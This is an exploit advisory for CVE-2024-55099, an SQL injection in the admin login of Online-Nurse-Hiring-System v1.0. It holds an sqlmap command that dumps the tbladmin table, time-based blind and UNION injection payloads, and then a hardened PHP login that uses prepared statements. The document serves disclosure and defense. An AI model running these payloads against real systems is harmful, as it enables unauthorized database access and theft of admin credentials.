- Exploit Author: ugurkarakoc
- Online-Nurse-Hiring-System-v1.0 has insufficient input validation and sanitization of the 'username' parameter, which can create a vulnerability to SQL injection attacks, enabling unauthorized access to the database and compromising system security.
- CVE ID: CVE-2024-55099
- Affected Version: Online-Nurse-Hiring-System-v1.0
- Vulnerable File: /admin/index.php
- Parameter Names: username
- Attack Type: Local
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
- https://nvd.nist.gov/vuln/detail/CVE-2024-55099
- The lack of proper input validation and sanitization on the 'username' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.

```
sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
```

```
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---
```
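
A hardened form of the admin login lookup, as an added example that is not the project's own code: the `username` value is bound through a prepared statement, so neither payload shape reported above is parsed as SQL. Only the `tbladmin` table, the `onhsdb` database and the POST field names (`username`, `inputpwd`, `login`) come from this advisory; the column names, the DB account, the `ONHS_DB_PASS` variable, the `admin_id` session key and `dashboard.php` are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed schema: tbladmin(ID, UserName, Password), with Password holding a
// password_hash() value. Column names are hypothetical, not from the project.

// Make mysqli throw on errors instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function find_admin(mysqli $db, string $username, string $password): ?int
{
    // Allow-list check: reject anything a legitimate account name would not contain.
    if (!preg_match('/\A[A-Za-z0-9_.@-]{1,64}\z/', $username)) {
        return null;
    }
    // The value is bound as data, so quotes, UNION or SLEEP() inside it
    // never become part of the SQL statement.
    $stmt = $db->prepare('SELECT ID, Password FROM tbladmin WHERE UserName = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($id, $hash);
    $found = $stmt->fetch();
    $stmt->close();
    // Same outcome for an unknown user and a wrong password.
    if ($found !== true || !password_verify($password, (string) $hash)) {
        return null;
    }
    return (int) $id;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['login'])) {
    $user = $_POST['username'] ?? '';
    $pass = $_POST['inputpwd'] ?? '';
    // Hypothetical connection details; the DB account should hold only the
    // privileges the login page needs.
    $db = new mysqli('localhost', 'onhs_app', getenv('ONHS_DB_PASS') ?: '', 'onhsdb');
    $db->set_charset('utf8mb4');
    // Array-valued fields (username[]=...) are rejected before any query runs.
    $adminId = (is_string($user) && is_string($pass)) ? find_admin($db, $user, $pass) : null;
    if ($adminId === null) {
        http_response_code(401);
        exit('Invalid username or password');
    }
    session_start();
    session_regenerate_id(true); // new session ID after authentication
    $_SESSION['admin_id'] = $adminId;
    header('Location: dashboard.php');
    exit;
}
```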